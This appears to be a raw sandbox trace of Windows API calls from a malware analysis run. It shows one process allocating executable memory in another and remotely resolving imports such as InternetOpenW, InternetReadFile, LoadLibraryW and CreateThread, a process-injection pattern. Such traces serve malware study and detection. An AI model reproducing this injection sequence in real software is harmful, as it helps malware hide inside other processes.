	[0225.397] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.397] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.397] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.397] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.397] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.397] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1000408c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.398] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.398] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.398] lstrlenA (lpString="InternetReadFile") returned 16
	[0225.398] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.398] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc1f6*, nSize=0x11, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc1f6*, lpNumberOfBytesWritten=0x128674*=0x11) returned 1
	[0225.398] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.398] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.398] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.399] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.399] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.399] ResetEvent (hEvent=0x5d4) returned 1
	[0225.399] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.400] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.400] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.400] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.400] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.400] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004090, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.400] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.401] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.401] lstrlenA (lpString="InternetOpenW") returned 13
	[0225.401] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.401] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc1a8*, nSize=0xe, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc1a8*, lpNumberOfBytesWritten=0x128674*=0xe) returned 1
	[0225.401] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.401] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.401] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.401] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.402] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.402] ResetEvent (hEvent=0x5d4) returned 1
	[0225.402] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.402] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.402] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.402] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.402] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.402] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004094, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.403] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.403] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.403] lstrlenA (lpString="InternetCloseHandle") returned 19
	[0225.403] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.403] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc1cc*, nSize=0x14, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc1cc*, lpNumberOfBytesWritten=0x128674*=0x14) returned 1
	[0225.404] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.404] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.404] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.404] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.404] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.405] ResetEvent (hEvent=0x5d4) returned 1
	[0225.405] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.405] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.405] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.405] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.405] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.405] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004098, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.406] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.406] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0225.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27cc3de, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0225.406] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b5e8
	[0225.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27cc3de, cbMultiByte=-1, lpWideCharStr=0x277b5e8, cchWideChar=13 | out: lpWideCharStr="KERNEL32.dll") returned 13
	[0225.406] lstrlenW (lpString="KERNEL32.dll") returned 12
	[0225.406] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.406] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x277b5e8*, nSize=0x1a, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x277b5e8*, lpNumberOfBytesWritten=0x128674*=0x1a) returned 1
	[0225.407] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f8 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f8*=0x70) returned 1
	[0225.407] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.407] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.407] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0xc, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285f0*=0xc) returned 1
	[0225.407] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618*, nSize=0x70, lpNumberOfBytesWritten=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesWritten=0x1285f0*=0x70) returned 1
	[0225.407] ResetEvent (hEvent=0x5d4) returned 1
	[0225.408] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.408] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128618, nSize=0x70, lpNumberOfBytesRead=0x1285f0 | out: lpBuffer=0x128618*, lpNumberOfBytesRead=0x1285f0*=0x70) returned 1
	[0225.408] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.408] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.408] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.408] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x277b5e8) returned 1
	[0225.408] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.408] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.408] lstrlenA (lpString="Sleep") returned 5
	[0225.408] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.408] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc358*, nSize=0x6, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc358*, lpNumberOfBytesWritten=0x128674*=0x6) returned 1
	[0225.409] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.409] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.409] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.409] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.409] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.410] ResetEvent (hEvent=0x5d4) returned 1
	[0225.410] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.410] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.410] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.410] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.410] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.410] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004008, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.411] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.411] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.411] lstrlenA (lpString="EnterCriticalSection") returned 20
	[0225.411] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.411] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc2cc*, nSize=0x15, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc2cc*, lpNumberOfBytesWritten=0x128674*=0x15) returned 1
	[0225.411] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.412] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.412] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.412] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.412] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.412] ResetEvent (hEvent=0x5d4) returned 1
	[0225.412] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.413] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.413] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.413] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.413] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.413] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1000400c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.413] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.414] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.414] lstrlenA (lpString="SetConsoleOutputCP") returned 18
	[0225.414] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.414] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc3ca*, nSize=0x13, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc3ca*, lpNumberOfBytesWritten=0x128674*=0x13) returned 1
	[0225.414] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.414] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.414] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.414] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.415] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.415] ResetEvent (hEvent=0x5d4) returned 1
	[0225.415] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.415] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.415] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.415] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.415] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.415] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004010, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.416] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.416] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.416] lstrlenA (lpString="WideCharToMultiByte") returned 19
	[0225.416] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.417] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc3b4*, nSize=0x14, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc3b4*, lpNumberOfBytesWritten=0x128674*=0x14) returned 1
	[0225.417] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.417] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.417] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.417] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.418] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.418] ResetEvent (hEvent=0x5d4) returned 1
	[0225.418] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.418] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.418] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.418] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.419] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.419] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004014, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.419] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.419] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.419] lstrlenA (lpString="DeleteCriticalSection") returned 21
	[0225.419] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.419] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc39c*, nSize=0x16, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc39c*, lpNumberOfBytesWritten=0x128674*=0x16) returned 1
	[0225.420] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.420] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.420] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.420] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.420] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.421] ResetEvent (hEvent=0x5d4) returned 1
	[0225.421] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.421] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.421] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.421] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.421] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.421] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x10004018, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0225.422] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0225.422] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0225.422] lstrlenA (lpString="CreateThread") returned 12
	[0225.422] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0225.422] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x20000, lpBuffer=0x27cc38c*, nSize=0xd, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27cc38c*, lpNumberOfBytesWritten=0x128674*=0xd) returned 1
	[0225.422] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0225.423] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffb70
	[0225.423] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0225.423] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0xe0000, lpBuffer=0x22ffb70*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffb70*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0225.423] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0225.423] ResetEvent (hEvent=0x5d4) returned 1
	[0225.423] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0225.487] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0225.487] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.487] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffb70) returned 1
	[0225.487] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0225.487] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1000401c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
